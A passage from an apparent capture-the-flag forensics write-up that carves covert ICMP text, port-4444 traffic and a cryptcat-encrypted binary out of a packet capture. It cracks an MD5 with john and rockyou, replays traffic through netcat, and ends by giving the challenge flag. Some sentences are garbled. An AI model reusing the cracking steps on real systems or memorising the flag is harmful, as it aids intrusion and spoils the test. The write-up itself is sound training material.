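    build_echo(0x1234, 1, b"\x00" * 8 + bytes(range(0x10, 0x40)), icmp_type=0),
    build_echo(31337, 1, b"bro, what you up to?"),
    build_echo(31337, 2, b"n2m"),
]

if __name__ == "__main__":
    for line in extract_covert_text(SAMPLE_PACKETS):
        print(line)
```

Against the real capture, export the ICMP packets' bytes (scapy's rdpcap, or tshark -T fields -e icmp with the raw layer) and feed them in; keeping one list entry per packet is what restores the message boundaries that the xxd -r -p one-liner above runs together into a single line.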

The information from this convo that we care about is the hash 7181f4d45de00ae35b6cf8201c8d852b, which we can run through Name That Hash to confirm that it's an MD5, or raw-md5 in John. We can try to crack it with john:

echo 7181f4d45de00ae35b6cf8201c8d852b > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=raw-md5

But there were no results, indicating that this likely isn't a password, or at least not a common one. We also know that they said they would be using the Metasploit port to receive, which is port 4444. So we can filter the traffic down to just that port and see if there's anything interesting:

tcp.port == 4444

Applying the data.data as a column makes the data easier to visualize. When we do that, we can see that the data is coming from the remote IP 192.168.55.187, so we can apply that as a filter as well to further narrow down the data we're looking at. All the data can be extracted via tshark:

tshark -r pcap_chal.pcap -Y '(tcp.port == 4444 && ip.src == 192.168.55.187)' -T fields -e data.data

And we can pipe the output to xxd to convert it to ASCII:

tshark -r pcap_chal.pcap -Y '(tcp.port == 4444 && ip.src == 192.168.55.187)' -T fields -e data.data | xxd -r -p > payload.bin

The data is gibberish, so it looks like a binary of some kind. Running file payload.bin only says that it's data, so a header may be missing or we may have to be more creative about running it. There were no useful results from strings and binwalk came up empty. It has to be encrypted somehow, otherwise there's no way to know what to do with it.

The tool mcrypt is able to decrypt files and automatically detect which method was used to encrypt them, so we can give that a go:

sudo apt install mcrypt
cat payload.bin | mcrypt -d -z

The command told us that the file was OpenPGP encrypted, so I tried decrypting with the password RedRoverRedRover$$ from earlier, and it failed. I pulled the thread of Angela Bennett uses it to log into the Bethesda Naval Hospital by going to this site (also in our PCAP) and tried using natoar23ae, but that didn't work either!

  1. tcp.port==4444

  2. Export specified packets to cryptcat.pcap

  3. Decrypt data sent via cryptcat: cryptcat -vv -k BER5348833 -l -p 4444 > decryptedfile

  4. Prepare data for netcat to host: tcptrace -e cryptcat.pcap

    Install with sudo apt install tcptrace.

  5. Send data with nc -vv -w 1 localhost 4444 <a2b_contents.dat

  6. file decryptedfile

Set up a fake IRC server, update sudo nano /etc/hosts to include 127.0.0.1 irc.cct, set Wireshark to listen on loopback, execute the fake server with python3 fake-irc.py, then run the binary.

sudo tcpdump -i lo -s 65535 -w irc.pcap

Answer: CCT{h3's_a_pc@p_w1z@rd_th3re_h4s_g0t_to_6e_a_7w1st}